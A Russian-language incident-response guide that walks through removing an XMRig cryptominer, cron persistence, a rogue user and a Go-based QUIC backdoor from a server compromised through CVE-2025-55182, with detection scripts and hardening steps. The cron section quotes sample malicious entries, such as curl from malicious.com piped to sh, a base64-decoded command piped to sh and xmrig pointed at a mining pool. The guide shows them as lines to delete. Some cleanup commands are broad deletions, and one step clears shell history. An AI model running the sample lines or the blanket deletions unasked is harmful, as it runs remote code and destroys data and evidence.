Очистка сервера от майнера XMRig
Пошаговое руководство по удалению криптомайнера
после эксплуатации CVE-2025-55182 (React2Shell)
Что произошло
История реальной компрометации
Это реальная история очистки production сервера от криптомайнера, который был установлен через эксплуатацию критической уязвимости CVE-2025-55182 (React2Shell) в React 19. Сервер был скомпрометирован, установлен майнер Monero (XMRig), создан новый пользователь и настроен автозапуск через cron.
Хронология событий
Сайты перестали загружаться. При проверке сервера обнаружена 100% загрузка CPU. Первая мысль — DDoS атака или проблема с приложением.
Была предпринята перезагрузка сервера через панель управления. Однако после перезагрузки нагрузка на CPU осталась 100%. Стало ясно, что проблема глубже.
При проверке активных процессов командой ps aux был обнаружен процесс xmrig — известный криптомайнер Monero.
Дальнейшее расследование показало наличие:
- Исполняемых файлов майнера в системе
- Зашифрованных скриптов запуска
- Задач в cron для автозапуска
- Нового пользователя с привилегиями
- Backdoor для постоянного доступа (QUIC протокол)
Была проведена полная очистка системы, удаление всех вредоносных файлов, обновление React и восстановление безопасности сервера.
Обнаружение проблемы
100% загрузка CPU и недоступность сайтов
Первые признаки компрометации
Первым признаком стала полная недоступность всех сайтов на сервере. При входе в панель управления хостингом обнаружилась критическая ситуация:
- CPU: 100% — все ядра загружены на максимум
- Load Average: значительно превышает количество ядер
- Сайты не отвечают — timeout при попытке загрузки
- SSH отклики медленные — система еле отвечает
Проверка активных процессов
Первым делом необходимо было проверить, что именно нагружает систему. Для этого используется команда ps aux, которая показывает все запущенные процессы с информацией об использовании ресурсов.
# Показать все процессы с сортировкой по CPU
ps aux --sort=-%cpu | head -n 20
# Более детальный вывод с обновлением в реальном времени
top -b -n 1 | head -n 20
# Или интерактивный вариант
htop
В списке процессов был обнаружен xmrig — это популярный open-source майнер для криптовалюты Monero (XMR). Процесс потреблял практически все ресурсы CPU.
XMRig часто используется атакующими из-за:
- Эффективности майнинга Monero на CPU
- Анонимности Monero (нельзя отследить транзакции)
- Простоты настройки и запуска
- Кроссплатформенности (Linux, Windows, macOS)
Остановка майнера
Немедленное прекращение вредоносной активности
После обнаружения майнера необходимо немедленно остановить процесс, чтобы освободить ресурсы сервера и предотвратить дальнейший ущерб.
Остановка процесса xmrig
# Способ 1: Убить процесс по имени (рекомендуется)
killall -9 xmrig
# Способ 2: Найти PID и убить
kill -9 $(pidof xmrig)
# Способ 3: Если имя процесса замаскировано
# Сначала находим PID через ps aux
ps aux | grep xmrig
# Затем убиваем по PID
kill -9 PID_ПРОЦЕССА
# Проверить что процесс остановлен
ps aux | grep xmrig
# Не должно быть вывода
# Проверить загрузку CPU
top -b -n 1 | head -n 10
# Загрузка должна упасть
kill -9— принудительное завершение процесса (SIGKILL)killall— убивает все процессы с указанным именемpidof— находит PID процесса по имени$(команда)— подстановка результата команды
Что произошло после остановки
После выполнения команды kill -9 $(pidof xmrig) процесс майнера был немедленно остановлен. Загрузка CPU упала с 100% до нормальных значений (5-15%). Сайты начали снова отвечать на запросы.
Однако это только временное решение! Майнер мог быть настроен на автозапуск, поэтому необходимо найти и удалить все связанные файлы.
Поиск файлов майнера
Обнаружение всех вредоносных компонентов
Поиск исполняемых файлов xmrig
Теперь необходимо найти все файлы, связанные с майнером. Используем команду find для рекурсивного поиска по всей файловой системе.
# Поиск файлов с именем xmrig
find / -type f -name "*xmrig*" 2>/dev/null
# Поиск файлов и вывод содержимого (grep)
find / -type f -exec grep -l "xmrig" {} \; 2>/dev/null
# Поиск в типичных локациях
find /tmp /var/tmp /home /root -name "*xmrig*" 2>/dev/null
# Поиск исполняемых файлов, измененных за последние 7 дней
find / -type f -executable -mtime -7 2>/dev/null
# Поиск по содержимому (медленно, но эффективно)
grep -r "xmrig" /tmp /var/tmp /home 2>/dev/null
Были найдены следующие файлы:
- Исполняемый файл майнера:
/root/.cache/.sys/xmrigили скрытая директория - Зашифрованные скрипты: обфусцированные bash/python скрипты рядом с майнером
- Конфигурационные файлы: config.json с адресами майнинг-пулов
- Скрипты в /tmp: дополнительные вредоносные скрипты
- Файлы в домашних директориях: бэкдоры и дополнительные компоненты
Типичные локации майнеров
/tmpи/var/tmp— временные директории, часто используются/dev/shm— RAM диск, файлы удаляются при перезагрузке/home/*/.config— скрытые директории пользователей/var/spool/cron— cron jobs/etc/init.dи/etc/systemd/system— автозагрузка/usr/binи/usr/local/bin— маскировка под системные файлы/opt— дополнительное ПО/root— дополнительное ПО
Удаление вредоносных файлов
Полная очистка системы
Удаление майнера и скриптов
После обнаружения всех файлов, перешел в директорию с майнером и удалил xmrig вместе со всеми скриптами, находящимися рядом с ним.
# Перейти в директорию с майнером (например)
cd /tmp
# Посмотреть содержимое
ls -la
# Удалить xmrig
rm -f xmrig
# Удалить все связанные скрипты (будьте осторожны!)
rm -f *.sh
rm -f config.json
rm -f .hidden_file
# Удалить скрытые файлы и директории
rm -rf .hidden_dir
# Найти и удалить все файлы xmrig рекурсивно
find / -name "*xmrig*" -type f -delete 2>/dev/null
# Удалить файлы в /tmp (созданные недавно)
find /tmp -type f -mtime -7 -delete
# Очистить /var/tmp
find /var/tmp -type f -mtime -7 -delete
Рядом с майнером были обнаружены обфусцированные (зашифрованные) bash-скрипты. Это типичная практика атакующих для сокрытия вредоносного кода.
Не пытайтесь их запустить! Они могут:
- Переустановить майнер
- Загрузить дополнительные вредоносные компоненты
- Создать новые backdoor
- Уничтожить данные
Просто удалите их немедленно.
Очистка дополнительных локаций
# Очистить /dev/shm (RAM диск)
rm -rf /dev/shm/*
# Проверить и очистить домашние директории
find /home -name "*miner*" -o -name "*xmrig*" 2>/dev/null
find /home -name "*miner*" -o -name "*xmrig*" -delete 2>/dev/null
# Проверить /opt
ls -la /opt
rm -rf /opt/suspicious_folder
# Проверить /var/lib
find /var/lib -type f -mtime -7 2>/dev/null
# Очистить bash history (может содержать команды атакующего)
cat /dev/null > ~/.bash_history
history -c
Очистка планировщика cron
Удаление автозапуска майнера
Проверка cron jobs
Атакующие почти всегда настраивают автозапуск майнера через cron, чтобы он перезапускался после остановки или перезагрузки сервера.
# Проверить cron текущего пользователя
crontab -l
# Проверить cron для root
sudo crontab -l
# Проверить cron для всех пользователей
for user in $(cut -f1 -d: /etc/passwd); do
echo "=== Crontab for $user ==="
sudo crontab -u $user -l 2>/dev/null
done
# Проверить системные cron
cat /etc/crontab
ls -la /etc/cron.d/
ls -la /etc/cron.hourly/
ls -la /etc/cron.daily/
ls -la /var/spool/cron/crontabs/
В crontab была найдена подозрительная задача, которая запускала майнер. Типичные признаки вредоносных cron jobs:
- Запуск из
/tmpили/dev/shm - Странные команды с curl/wget
- Запуск каждые несколько минут
- Перенаправление вывода в
/dev/null - Обфусцированные команды (base64, hex)
Удаление вредоносных cron jobs
# Удалить весь crontab текущего пользователя
crontab -r
# Или редактировать и удалить только подозрительные строки
crontab -e
# В редакторе: удалите подозрительные строки, сохраните
# Удалить для конкретного пользователя
sudo crontab -u suspicious_user -r
# Удалить файлы из /etc/cron.d/
sudo rm /etc/cron.d/suspicious_job
# Проверить /etc/cron.hourly и т.д.
sudo rm /etc/cron.hourly/suspicious_script.sh
# Проверить что cron очищен
crontab -l
# Не должно быть подозрительных задач
# Запуск каждые 5 минут
*/5 * * * * curl -s http://malicious.com/x | sh
# Запуск xmrig из /tmp
*/10 * * * * /tmp/xmrig -o pool.supportxmr.com:3333 > /dev/null 2>&1
# Проверка и перезапуск майнера
* * * * * pgrep xmrig || /tmp/.hidden/run.sh
# Обфусцированная команда
*/15 * * * * echo "base64_encoded_command" | base64 -d | sh
Все такие строки необходимо немедленно удалить!
Удаление постороннего пользователя
Закрытие backdoor для повторного доступа
Поиск новых пользователей
Атакующие часто создают нового пользователя для постоянного доступа к серверу (persistence). Это позволяет им вернуться даже после удаления майнера.
# Показать всех пользователей
cat /etc/passwd
# Показать только пользователей с shell (потенциально опасные)
cat /etc/passwd | grep -v "/nologin" | grep -v "/false"
# Показать недавно созданных пользователей
ls -lt /home | head
# Проверить последние логины
last
# Показать пользователей с UID >= 1000 (обычные пользователи)
awk -F: '$3 >= 1000 {print $1}' /etc/passwd
# Проверить sudo права
cat /etc/sudoers
ls -la /etc/sudoers.d/
При проверке был обнаружен новый пользователь, которого администратор не создавал. Признаки подозрительного пользователя:
- Недавно созданная домашняя директория
- Странное имя (например: user, test, admin2, system)
- Наличие SSH ключей в
~/.ssh/authorized_keys - История команд с вредоносной активностью
- Cron jobs для запуска майнера
Удаление вредоносного пользователя
# Удалить пользователя вместе с домашней директорией
sudo userdel -r suspicious_username
# Если не удаляется, сначала убить процессы пользователя
sudo pkill -u suspicious_username
sudo userdel -r suspicious_username
# Проверить что пользователь удален
cat /etc/passwd | grep suspicious_username
# Не должно быть вывода
# Проверить что домашняя директория удалена
ls /home/
# suspicious_username не должно быть
# Удалить из sudo (если был добавлен)
sudo deluser suspicious_username sudo
# Проверить и удалить из sudoers
sudo visudo
# Удалить строки с suspicious_username
Проверка SSH ключей
# Проверить SSH ключи root
cat /root/.ssh/authorized_keys
# Проверить для всех пользователей
for user in $(ls /home); do
echo "=== $user ==="
cat /home/$user/.ssh/authorized_keys 2>/dev/null
done
# Удалить неизвестные ключи
# ОСТОРОЖНО: не удалите свои ключи!
nano /root/.ssh/authorized_keys
# Удалите подозрительные публичные ключи
# Изменить пароль root
passwd root
# Изменить пароли всех пользователей
passwd your_username
Обновление React
Закрытие уязвимости CVE-2025-55182
Критически важный шаг
Если не обновить React, сервер будет взломан снова! Уязвимость CVE-2025-55182 позволяет атакующим получать доступ к серверу без аутентификации. Удаление майнера — это только устранение последствий, но не причины.
Обновление пакетов React
# Перейти в директорию проекта
cd /path/to/your/react/project
# Проверить текущую версию
npm list react react-dom
# Обновить до безопасной версии 19.2.1
npm install react@19.2.1 react-dom@19.2.1
# Обновить все зависимости
npm update
# Автоматическое исправление уязвимостей
npm audit fix
# Если требуется принудительное обновление
npm audit fix --force
# Проверить что уязвимость устранена
npm audit
# Должно показать: found 0 vulnerabilities ✅
# Пересобрать проект
npm run build
# Перезапустить приложение
pm2 restart all
# или
systemctl restart your-app-name
- React 19.0.1+ (для ветки 19.0.x)
- React 19.1.2+ (для ветки 19.1.x)
- React 19.2.1+ (рекомендуется — latest)
Проверка сетевых соединений
Поиск connections к майнинг-пулам
Проверка открытых портов и соединений
Майнеры обычно подключаются к майнинг-пулам через специфичные порты. Для Monero (XMR) типичные порты: 3333, 5555, 7777, 14444.
# Показать все активные соединения
netstat -tunlp
# Показать только ESTABLISHED соединения
netstat -tunlp | grep ESTABLISHED
# Использовать ss (современная альтернатива netstat)
ss -tunlp
# Поиск соединений на типичных портах майнинга
ss -tunlp | grep -E "3333|5555|7777|14444"
netstat -an | grep -E "3333|5555|7777|14444"
# Показать процессы с сетевой активностью
lsof -i -P -n
# Проверить исходящие соединения
iptables -L OUTPUT -v -n
# Мониторинг сетевой активности в реальном времени
iftop
# или
nethogs
При проверке подозрительных соединений на порты майнинг-пулов не обнаружено. Это подтверждает, что майнер был успешно остановлен и удален.
Если бы соединения были найдены, это указывало бы на:
- Майнер все еще работает под другим именем
- Есть дополнительные процессы майнинга
- Backdoor переустановил майнер
Блокировка майнинг-пулов
# Заблокировать исходящие соединения на типичные порты майнинга
iptables -A OUTPUT -p tcp --dport 3333 -j DROP
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 14444 -j DROP
# Сохранить правила
iptables-save > /etc/iptables/rules.v4
# Заблокировать известные майнинг-пулы
iptables -A OUTPUT -d pool.supportxmr.com -j DROP
iptables -A OUTPUT -d xmrpool.eu -j DROP
iptables -A OUTPUT -d monero.crypto-pool.fr -j DROP
# Проверить правила
iptables -L OUTPUT -v -n
Анализ подозрительных файлов
Обнаружение QUIC backdoor
Поиск недавно созданных файлов
После основной очистки важно проверить все недавно созданные или измененные файлы, так как атакующие могли установить дополнительные backdoor для повторного доступа.
# Найти все файлы, измененные за последние 7 дней
find / -type f -mtime -7 2>/dev/null | head -50
# Найти исполняемые файлы за последние 7 дней
find / -type f -executable -mtime -7 2>/dev/null
# Найти файлы по размеру (майнеры обычно 2-10 MB)
find / -type f -size +2M -size -10M -mtime -7 2>/dev/null
# Найти скрытые файлы (начинаются с точки)
find / -name ".*" -type f -mtime -7 2>/dev/null
# Найти файлы без расширения в /tmp, /var/tmp
find /tmp /var/tmp /dev/shm -type f ! -name "*.*" 2>/dev/null
# Проверить файлы в системных директориях
find /usr/bin /usr/local/bin -type f -mtime -7 2>/dev/null
При проверке были найдены несколько недавно созданных файлов с подозрительными характеристиками:
- Исполняемые файлы без расширения
- Файлы в необычных локациях
- Бинарные файлы, скомпилированные на Go
- Свежая дата модификации
Анализ через HEX редактор
Для более детального анализа подозрительных файлов был использован HEX редактор, который позволяет увидеть сырое содержимое бинарных файлов.
# Просмотр HEX содержимого файла
xxd suspicious_file | less
# Или использовать hexdump
hexdump -C suspicious_file | less
# Извлечь читаемые строки из бинарника
strings suspicious_file | less
# Поиск конкретных строк
strings suspicious_file | grep -i "github\|http\|.com"
# Определить тип файла
file suspicious_file
# Проверить ELF заголовок (Linux executables)
readelf -h suspicious_file
# Посмотреть первые байты (magic numbers)
head -c 20 suspicious_file | xxd
Обнаружение QUIC backdoor
При анализе одного из файлов в середине бинарного кода были обнаружены текстовые строки:
github.com/quic-go/quic-go/path/ManagerOutgoing
Это указывает на использование библиотеки quic-go — Go-реализации протокола QUIC.
Что такое QUIC и почему это опасно?
QUIC (Quick UDP Internet Connections) — это современный сетевой протокол, разработанный Google, который используется в HTTP/3.
Почему атакующие используют QUIC:
- Быстрее TCP: меньше задержек при установке соединения
- Работает поверх UDP: сложнее детектировать файрволами
- Встроенное шифрование: трафик зашифрован по умолчанию
- Обход блокировок: многие DPI системы не анализируют QUIC
- Надежность: переживает смену IP адреса
Обнаруженный файл — это backdoor троян, написанный на Go с использованием QUIC протокола. Он предоставляет атакующим:
- Скрытый канал связи с C&C сервером
- Удаленное выполнение команд через зашифрованное соединение
- Возможность переустановки майнера после удаления
- Обход большинства файрволов (UDP трафик)
- Persistence — постоянный доступ к серверу
Этот файл был немедленно удален!
Удаление backdoor
# Найти процесс, если запущен
ps aux | grep quic
lsof | grep quic
# Убить процесс
killall -9 suspicious_process_name
# Удалить файл
rm -f /path/to/backdoor/file
# Найти другие Go-бинарники, созданные недавно
find / -type f -executable -mtime -7 -exec file {} \; 2>/dev/null | grep "Go"
# Проверить сетевые соединения QUIC (UDP порт 443 обычно)
ss -u | grep 443
netstat -u | grep 443
# Заблокировать исходящий UDP трафик на подозрительные IP
iptables -A OUTPUT -p udp -d suspicious.ip -j DROP
Постоянный мониторинг
Предотвращение повторной компрометации
Настройка мониторинга сервера
После очистки критически важно установить постоянный мониторинг для раннего обнаружения любой подозрительной активности.
#!/bin/bash
# /usr/local/bin/cpu-monitor.sh
# Email для уведомлений
ADMIN_EMAIL="admin@example.com"
# Пороговое значение CPU
CPU_THRESHOLD=80
# Получить текущую загрузку CPU
CPU_USAGE=$(top -bn1 | grep "Cpu(s)" | awk '{print $2}' | cut -d'%' -f1)
# Сравнить с порогом
if (( $(echo "$CPU_USAGE > $CPU_THRESHOLD" | bc -l) )); then
# Получить топ процессы
TOP_PROCESSES=$(ps aux --sort=-%cpu | head -n 10)
# Отправить email
echo "High CPU usage detected: ${CPU_USAGE}%
Top processes:
$TOP_PROCESSES" | mail -s "🚨 CPU Alert on $(hostname)" $ADMIN_EMAIL
# Логировать
echo "[$(date)] High CPU: ${CPU_USAGE}%" >> /var/log/cpu-monitor.log
fi
# Сделать скрипт исполняемым
chmod +x /usr/local/bin/cpu-monitor.sh
# Добавить в crontab (проверка каждые 15 минут)
crontab -e
# Добавить строку:
*/15 * * * * /usr/local/bin/cpu-monitor.sh
Мониторинг процессов майнеров
#!/bin/bash
# /usr/local/bin/miner-detector.sh
ADMIN_EMAIL="admin@example.com"
# Список известных майнеров
MINERS="xmrig|cpuminer|minerd|ccminer|sgminer|bfgminer|claymore"
# Проверить запущенные процессы
DETECTED=$(ps aux | grep -E "$MINERS" | grep -v grep)
if [ ! -z "$DETECTED" ]; then
echo "💀 MINER DETECTED!
Processes:
$DETECTED
$(date)" | mail -s "🚨 MINER ALERT on $(hostname)" $ADMIN_EMAIL
# Логировать
echo "[$(date)] MINER DETECTED!" >> /var/log/security.log
echo "$DETECTED" >> /var/log/security.log
# Опционально: автоматически убить
# killall -9 xmrig cpuminer minerd
fi
# Проверить сетевые соединения к майнинг-пулам
POOL_CONNECTIONS=$(netstat -an | grep -E "3333|5555|7777|14444" | grep ESTABLISHED)
if [ ! -z "$POOL_CONNECTIONS" ]; then
echo "🌐 Mining pool connection detected!
$POOL_CONNECTIONS" | mail -s "🚨 Pool Connection Alert" $ADMIN_EMAIL
fi
Мониторинг новых файлов
# Установить inotify-tools
apt install inotify-tools -y
# Мониторинг /tmp на создание файлов
inotifywait -m /tmp -e create -e modify |
while read path action file; do
echo "[$(date)] $action $path$file" >> /var/log/file-monitor.log
done &
# Или использовать AIDE (Advanced Intrusion Detection Environment)
apt install aide -y
aideinit
cp /var/lib/aide/aide.db.new /var/lib/aide/aide.db
# Ежедневная проверка целостности
echo "0 2 * * * /usr/bin/aide --check | mail -s 'AIDE Report' admin@example.com" | crontab -
Настройка fail2ban
# Установить fail2ban
apt install fail2ban -y
# Создать конфигурацию
cat > /etc/fail2ban/jail.local <<'EOF'
[DEFAULT]
bantime = 3600
findtime = 600
maxretry = 5
[sshd]
enabled = true
port = ssh
logpath = /var/log/auth.log
[nginx-limit-req]
enabled = true
filter = nginx-limit-req
logpath = /var/log/nginx/error.log
[nginx-botsearch]
enabled = true
filter = nginx-botsearch
logpath = /var/log/nginx/access.log
EOF
# Запустить fail2ban
systemctl enable fail2ban
systemctl start fail2ban
# Проверить статус
fail2ban-client status
Логирование и анализ
- rsyslog: централизованное логирование
- Logwatch: ежедневные отчеты по логам
- OSSEC: HIDS (Host-based Intrusion Detection)
- Wazuh: комплексная платформа безопасности
- Prometheus + Grafana: визуализация метрик
Итоговый чек-лист
Убедитесь, что выполнены все шаги
Контрольный список очистки
- ✅ Остановлен процесс xmrig
- ✅ Удалены все файлы майнера из /tmp, /var/tmp и других локаций
- ✅ Очищен crontab от вредоносных задач
- ✅ Удален посторонний пользователь
- ✅ Обновлен React до 19.2.1 (закрыта CVE-2025-55182)
- ✅ Проверены сетевые соединения — нет connections к майнинг-пулам
- ✅ Удалены backdoor файлы (включая QUIC backdoor)
- ✅ Изменены все пароли (root, пользователи)
- ✅ Проверены SSH ключи — удалены неизвестные
- ✅ Настроен мониторинг CPU, процессов, файлов
Дополнительные меры безопасности
- Обновите всю систему:
apt update && apt upgrade -y - Включите автообновления безопасности
- Настройте файрвол (ufw/iptables) — только необходимые порты
- Отключите root SSH:
PermitRootLogin no - Используйте только SSH ключи — отключите пароли
- Установите WAF (ModSecurity/Cloudflare)
- Настройте регулярные бэкапы
- Включите SELinux/AppArmor
Выводы и уроки
Что мы узнали из этого инцидента
Ключевые выводы
- Уязвимости критичны: CVE-2025-55182 с CVSS 10.0 позволяет полную компрометацию без аутентификации
- Обновления жизненно важны: промедление даже на день может привести к взлому
- Атакующие действуют быстро: эксплуатация началась в течение часов после раскрытия
- Многоуровневая защита: майнер + backdoor + новый пользователь + cron
- Мониторинг необходим: без мониторинга можно не заметить компрометацию неделями
Что делает атака эффективной
Атакующие использовали многоступенчатый подход:
- Эксплуатация уязвимости — RCE через CVE-2025-55182
- Установка майнера — XMRig для Monero
- Persistence — cron job для автозапуска
- Backdoor — QUIC-based троян для удаленного доступа
- Новый пользователь — альтернативный способ доступа
- Обфускация — зашифрованные скрипты для сокрытия
Рекомендации на будущее
- Мониторинг уязвимостей: подписаться на security advisory
- Быстрые обновления: применять патчи в течение 24-48 часов
- Автоматизация: dependabot, renovate для автообновлений
- Мониторинг 24/7: CPU, процессы, сеть, файлы
- WAF и IDS: дополнительные уровни защиты
- Принцип наименьших привилегий: ограничить права приложений
- Регулярные аудиты безопасности
- Disaster Recovery план: готовность к инцидентам
После проведения всех описанных мер:
- Сервер очищен от всех вредоносных компонентов
- React обновлен до безопасной версии 19.2.1
- Настроен постоянный мониторинг
- Усилена общая безопасность системы
- Ведется наблюдение за нагрузкой и активностью
🟢 Сервер стабилен, подозрительной активности не обнаружено